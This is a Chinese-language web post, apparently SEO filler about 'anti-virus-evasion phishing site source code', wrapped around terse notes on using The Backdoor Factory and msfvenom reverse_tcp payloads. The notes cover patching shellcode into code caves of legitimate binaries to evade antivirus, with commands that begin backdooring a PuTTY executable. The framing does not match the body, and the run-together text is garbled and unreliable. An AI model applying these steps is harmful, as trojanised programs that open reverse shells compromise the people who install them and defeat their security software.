这篇文章给大家聊聊关于免杀钓鱼网站源码分享,以及免杀技术论坛对应的知识点,希望对各位有所帮助,不要忘了收藏本站哦。
通过替换EXE、DLL、注册表等方法修复系统漏洞或问题的方法BDF:向二进制文件中增加或者删除代码内容某些受保护的二进制程序无法patch存在一定概率文件会被patch坏掉
后门工厂
适用于windowsPEx32/x64和LinuxELFx32/x64(OSX)支持msfpayload、自定义payload将shellcode代码patch进模板文件,躲避AV检查Python语言编写
Msf使用patch方法
覆盖程序入口
msfvenom-pwindows/shell/reverse_tcp……
创建新的线程执行shellcode并跳回原程序入口
msfvenom-pwindows/shell/reverse_tcp-k
增加代码片段跳转执行后跳回源程序入口
CTP方法
增加新的代码段section,与MSF的-k方法类似使用现有的代码裂缝/洞(codesave)存放shellcode
代码洞
二进制文件中超过两个字节的连续x00区域(代码片段间区域)根据统计判断代码洞是编译器在进行编译时造成的,不同的编译器造成代码洞的大小不同单个代码洞大小不足以存放完整的shellcode多代码洞跳转(非顺序执行)初期免杀率可达100%结合msf的stager方法Patch选项附加代码段单代码洞注入多代码洞注入
BDF基本使用
准备
首先我们先下载一个putty当作注入程序
检查二进制文件是否支持代码注入
backdoor-factory-f[软件路径]-S
显示可用的payload
backdoor-factory-f[软件路径]-Sshow\niat_reverse_tcp_stager_threaded
查看cave大小
backdoor-factory-f[软件路径]-c-l
文章到此结束,如果本次分享的免杀钓鱼网站源码分享和免杀技术论坛的问题解决了您的问题,那么我们由衷的感到高兴!